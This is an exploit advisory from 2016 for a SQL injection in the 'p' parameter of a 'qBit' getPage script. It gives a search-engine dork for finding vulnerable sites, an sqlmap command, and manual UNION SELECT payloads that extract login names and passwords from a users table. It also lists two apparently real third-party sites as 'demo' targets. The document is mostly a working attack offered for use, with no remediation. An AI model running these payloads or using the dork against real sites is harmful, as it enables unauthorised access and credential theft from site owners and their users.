# ############################ # Exploit Title : qBit 'getPage' - 'p' Parameter SQL Injection # Exploit Dork : allinurl:"getPage?p=" # Exploit Date : 19/08/2016 # Discovered By : Dervish # Content Me : fb.com/alakber # nakhiyev.alakhber@gmail.com # Special Thanks : S3N4TOR , S4RC4SM , Region 20 # Greetz To : All Azerbaijan Hackers # Tested On : Kali , Ubuntu , Windows 7 # ############################ # Exploit # http://127.0.0.1/pages/getPage?p={parametr}" # Admin Page # http://127.0.0.1/admin # ############################ # SQLMAP Poc # ./sqlmap.py -u http://127.0.0.1/pages/getPage?p=parametr --dbs # [+++++++++++++++++++++++++++] # Manual Poc # Login Data : http://127.0.0.1/pages/getPage?p=-parametr" Union Select login,2,3,4,5,6,7,8,9 from users--+-" # Password Data : http://127.0.0.1/pages/getPage?p=-parametr" Union Select password,2,3,4,5,6,7,8,9 from users--+-" # ############################ # Demo Sites # http://troy-vavilon.com/pages/getPage?p=gallery # www.testbitep.net/aral/pages/pages/getPage?p=prom # ############################ # Watch the video # https://www.youtube.com/watch?v=-5Uy8DFzuHE ##############################